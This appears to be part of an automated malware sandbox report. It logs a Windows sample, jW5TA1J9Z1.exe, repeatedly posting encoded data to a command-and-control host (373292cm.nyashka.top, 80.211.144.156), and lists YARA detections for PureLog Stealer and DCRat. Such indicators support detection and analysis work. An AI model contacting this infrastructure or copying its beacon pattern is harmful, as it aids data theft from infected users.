                                                                    Aug 21, 2024 10:04:44.275019884 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:44.280909061 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    106192.168.2.75306580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:44.398610115 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:44.755855083 CEST2544OUTData Raw: 5a 50 59 57 51 40 54 5d 5b 5f 5a 51 59 5f 58 50 57 5a 5d 5f 57 51 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZPYWQ@T][_ZQY_XPWZ]_WQS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,@!>+7#%> \>>&<.?4<7;+)'#)\;>&F$.Y/
                                                                    Aug 21, 2024 10:04:45.081003904 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:45.215542078 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    107192.168.2.75306680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:45.338490009 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:45.693414927 CEST2544OUTData Raw: 5a 52 5c 54 54 46 51 5b 5b 5f 5a 51 59 5e 58 5e 57 58 5d 58 57 5f 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\TTFQ[[_ZQY^X^WX]XW_STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-86-^"3%Y)(\>=)+? <#!S(#Y /.&F$.Y/
                                                                    Aug 21, 2024 10:04:46.039570093 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:46.230125904 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    108192.168.2.75306780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:46.351188898 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:46.709491968 CEST2544OUTData Raw: 5a 50 5c 5e 51 47 54 5a 5b 5f 5a 51 59 5f 58 55 57 5f 5d 5d 57 5a 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\^QGTZ[_ZQY_XUW_]]WZS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#("><_#V")> <X&++X#?,7W?+*44!;>&F$.Y/
                                                                    Aug 21, 2024 10:04:47.053410053 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:47.195375919 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    109192.168.2.75306880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:47.320100069 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:47.677755117 CEST2544OUTData Raw: 5f 51 59 52 54 49 54 5a 5b 5f 5a 51 59 55 58 51 57 5e 5d 5b 57 5b 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYRTITZ[_ZQYUXQW^][W[SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/!>$_"#=Y)=,X>.-])=?[#/P !'?)?^"09^8&F$.Y/-
                                                                    Aug 21, 2024 10:04:48.010880947 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:48.145291090 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    110192.168.2.75306980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:48.273353100 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:48.630986929 CEST2544OUTData Raw: 5f 52 5c 57 51 43 54 5a 5b 5f 5a 51 59 5f 58 5e 57 5f 5d 5e 57 51 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _R\WQCTZ[_ZQY_X^W_]^WQSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.. 3E!-$ 9\+>+>-6+=;4Z 718R(9 735_;.&F$.Y/
                                                                    Aug 21, 2024 10:04:48.967870951 CEST25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    111192.168.2.75307080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:48.983721018 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:49.334218025 CEST1844OUTData Raw: 5a 52 59 54 51 44 51 5a 5b 5f 5a 51 59 51 58 53 57 5d 5d 5a 57 5e 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZRYTQDQZ[_ZQYQXSW]]ZW^S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y.38687]>0?.%\(X"/,4"'?:87*/&F$.Y/=
                                                                    Aug 21, 2024 10:04:49.677356005 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:49.813292027 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 1e 3d 35 3e 5b 25 05 2c 53 27 0d 21 0e 3d 04 2b 12 3d 03 08 05 25 3b 36 01 26 10 28 57 27 3b 0f 12 3c 00 2a 1b 24 2c 20 00 3a 0e 2b 5d 0c 13 21 05 37 03 29 00 25 02 0e 5b 3e 06 28 05 21 05 2a 59 3c 29 32 09 28 06 2f 03 3c 5f 37 5d 2b 2a 04 1f 3b 38 39 16 2e 09 26 1e 23 04 2b 52 0d 11 24 1f 2b 5b 21 1d 2a 2d 27 1a 35 06 0d 5e 27 5b 3a 51 31 22 32 1e 30 5f 38 1f 32 32 1c 09 27 32 29 55 24 2b 2d 06 32 3f 22 09 35 08 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &=5>[%,S'!=+=%;6&(W';<*$, :+]!7)%[>(!*Y<)2(/<_7]+*;89.&#+R$+[!*-'5^'[:Q1"20_822'2)U$+-2?"5#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    112192.168.2.75307180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:49.133306026 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:49.496773005 CEST2544OUTData Raw: 5f 51 59 50 51 44 54 5f 5b 5f 5a 51 59 5f 58 57 57 50 5d 5d 57 50 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYPQDT_[_ZQY_XWWP]]WPSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,;A#-X4>=?+>")=\"<#(9(7 )\/>&F$.Y/
                                                                    Aug 21, 2024 10:04:49.805289984 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:50.016907930 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    113192.168.2.75307280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:50.149502039 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:50.505877018 CEST2544OUTData Raw: 5a 52 59 54 54 47 54 51 5b 5f 5a 51 59 54 58 51 57 51 5d 5d 57 59 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZRYTTGTQ[_ZQYTXQWQ]]WYSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.8U !.4\7)Z)<_+=>(=4 Z+W#!??)845Y/.&F$.Y/)
                                                                    Aug 21, 2024 10:04:50.825835943 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:50.957684040 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    114192.168.2.75307380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:51.091443062 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:51.443417072 CEST2544OUTData Raw: 5a 52 59 52 54 41 54 5f 5b 5f 5a 51 59 50 58 53 57 51 5d 5c 57 5e 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZRYRTAT_[_ZQYPXSWQ]\W^SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.; '!-] %\*[#?=)\(-, /R !<937&.>&F$.Y/
                                                                    Aug 21, 2024 10:04:51.783622980 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:51.988327026 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    115192.168.2.75307480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:52.470546007 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:52.818470955 CEST2536OUTData Raw: 5f 5c 5c 57 54 44 54 5f 5b 5f 5a 51 59 57 58 5f 57 5c 5d 5f 57 5d 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\WTDT_[_ZQYWX_W\]_W]SUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/03C#=;736)=$+6)=7 ,42 (*'_43%^,>&F$.Y/
                                                                    Aug 21, 2024 10:04:53.142668009 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:53.273083925 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    116192.168.2.75307580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:53.400290966 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:53.755811930 CEST2544OUTData Raw: 5f 51 59 55 54 41 54 5b 5b 5f 5a 51 59 5e 58 50 57 5d 5d 58 57 5a 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYUTAT[[_ZQY^XPW]]XWZSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-80#D#-+7&=[ ?X!)=$ <0#(S()<#Y/.&F$.Y/
                                                                    Aug 21, 2024 10:04:54.086014986 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:54.504322052 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:54.504532099 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    117192.168.2.75307680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:54.635410070 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    118192.168.2.75307780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:54.824835062 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:55.526478052 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:05:10.244393110 CEST1868OUTData Raw: 5f 51 59 50 54 40 51 5e 5b 5f 5a 51 59 55 58 54 57 50 5d 5d 57 5c 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYPT@Q^[_ZQYUXTWP]]W\SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,+5=3# 2*>,>.>)-("<'7#(*;702.>&F$.Y/-
                                                                    Aug 21, 2024 10:05:10.546905994 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:05:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 54 3d 25 26 5b 26 3b 28 1b 30 0d 2a 1f 2a 3d 2f 5e 29 2e 2d 5f 24 06 0f 14 32 3e 2c 1d 24 15 21 10 2b 2e 26 19 26 3c 2f 10 2d 24 2b 5d 0c 13 22 58 20 2a 31 01 25 3c 34 5b 2b 28 3f 5a 36 05 36 59 28 04 26 0c 3f 2f 0a 13 28 39 05 58 2a 2a 03 0f 2f 16 36 05 39 33 36 1d 20 3e 2b 52 0d 11 24 1f 3c 3d 0c 0d 3e 10 16 00 22 28 0e 07 30 03 31 0d 26 32 29 0c 27 5f 23 03 26 0c 1b 56 27 31 07 57 31 02 2a 1c 25 59 25 1c 21 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &T=%&[&;(0**=/^).-_$2>,$!+.&&</-$+]"X *1%<4[+(?Z66Y(&?/(9X**/6936 >+R$<=>"(01&2)'_#&V'1W1*%Y%!#T,"W3UV


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:04:02:47
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0x630000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:04:02:49
